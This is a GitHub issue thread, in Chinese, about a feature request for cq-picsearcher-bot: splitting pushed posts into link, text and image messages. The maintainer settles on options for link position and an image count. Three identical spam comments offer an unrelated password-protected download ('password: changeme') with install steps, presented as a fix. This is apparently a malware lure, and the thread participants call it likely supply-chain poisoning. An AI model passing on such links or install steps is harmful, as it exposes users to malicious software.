### ISSUE TITLE
FR：动态推送的拆分

### ISSUE THREAD

**Issue by A2Sumie** [Tsuk1ko/cq-picsearcher-bot#470]
请说明：

1. 加什么功能 允许把图文动态分成链接+文字+图片三段消息，并允许按群设置不发某个部分
（贪心的把想要的都说的话，允许排版，群A 文字-链接-图片一条 群B文字+图片两条 群C文字+图片+链接，多图还全部拆成单张发....等)
2. 理由 有大尺寸图片的动态很容易推不出来或者等个10分钟才能推出来
（上面是次要的，主要是一些千群千面的需求和一些个人edge case的需求）

我感觉佬说过如果自定义要求高可以自己改什么东西但是我忘了stO

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by dionathanfreitas** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by A2Sumie** [comment]
上面这什么鬼东西？发的东西带密码还404的，来供应链投毒的吗

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Tsuk1ko** [comment]
最近好像有不少 repo 都被这种骚扰，估计投毒的，不要理

**Comment by Tsuk1ko** [comment]
链接为什么要和文字也分开🤔

**Comment by A2Sumie** [comment]
从外面预览看起手就是一个链接，以及现在我把bot放在一个小群里接推送再转出去，有链接会被再解析一次
不过如果能把链接放在后面其实也行

**Comment by Tsuk1ko** [comment]
那感觉是不是给两个设置就行

- 链接位置：前置，后置，无
- 图片是否单独发送

不过重复解析的问题最好还是bot之间相互屏蔽，如果能控制别的bot的黑名单的话

**Comment by A2Sumie** [comment]
对，其实就行了
图片方便的话弄成和文字合并发送，图片单独发送但是多图合并一条里发，图片单独发送且多图单独发，不发送四种（）

重复解析倒不是几个bot大串联，是我把我的bot解析出来的东西发出去他在收到的群再解一遍（）我自己没有兼容性方面的需求就是了

**Comment by Tsuk1ko** [comment]
可以，不过“图片单独发送且多图单独发”就不能保证图片顺序了

**Comment by A2Sumie** [comment]
我没问题，感谢

**Comment by Tsuk1ko** [comment]
![](https://github.com/user-attachments/assets/eb23c9ab-81bb-4f36-a389-d2893ca8a409)

坏消息，我感觉图片单独拆出来很麻烦，想咕咕，我只打算做成

- 链接位置：前置，后置，无
- 图片：可控制最多发送 n 张，n≥0，0就不发
